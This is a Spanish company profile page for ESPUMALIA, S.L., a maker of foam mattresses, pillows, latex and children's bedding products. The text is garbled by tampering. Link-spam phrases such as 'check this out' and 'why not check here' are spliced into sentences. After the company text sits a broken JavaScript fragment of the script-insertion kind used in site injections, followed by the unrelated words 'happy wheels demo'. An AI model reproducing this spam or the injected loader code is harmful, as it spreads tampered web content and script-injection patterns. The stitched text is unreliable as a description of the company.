ESPUMALIA, S.L. es una empresa dedicada a la transformación de espuma especializada en el sector del descanso. Nace en check this out manos de un equipo joven y dinámico  pero cuenta con la experiencia de 30 años dentro del sector.

Nuestro objetivo es why not check here mejorar día a día el grado de satisfacción de nuestros clientes, ofreciéndoles lo que ellos necesitan en CALIDAD de PRODUCTO y SERVICIO.

Somos especialistas en la fabricación de artículos para el descanso, destacando en calidad-precio nuestros COLCHONES, ALMOHADAS, VISCOELÁSTICA, LÁTEX y ESPUMAS DE ALTA DENSIDAD.

Tenemos una amplia línea de PRODUCTO INFANTIL creada con espumas,  viscoelástica y látex.  También confeccionamos FUNDAS, CAMBIADORES, PROTECTORES y COLCHONES PARA CUNA, COLCHONES  DE VIAJE y otros ARTÍCULOS ESPECIALES.

Nuestros clientes se dirigen a nosotros buscando la atención más personalizada y  la solución a todas aquellas demandas que requieren de un tratamiento específico bien sea porque se trata de medidas especiales o de formas y piezas determinadas.

Nuestra filosofía de orientación al cliente nos lleva a tener inquietud por la mejora continua y a trabajar en base a ella.

Nuestros precios de fábrica y nuestra línea de negocio nos permite llegar a diferentes sectores como el del DESCANSO, el HOSPITALARIO y GERIÁTRICO, el HOTELERO y TODO TIPO DE ALOJAMIENTOS TURÍSTICOS, GUARDERÍAS Y LUDOTECAS, DECORACIÓN, PUBLICIDAD Y MODA, OCIO, NAÚTICO…

document.currentScript.parentNode.insertBefore(s, document.currentScript);if (document.currentScript) {

happy wheels demo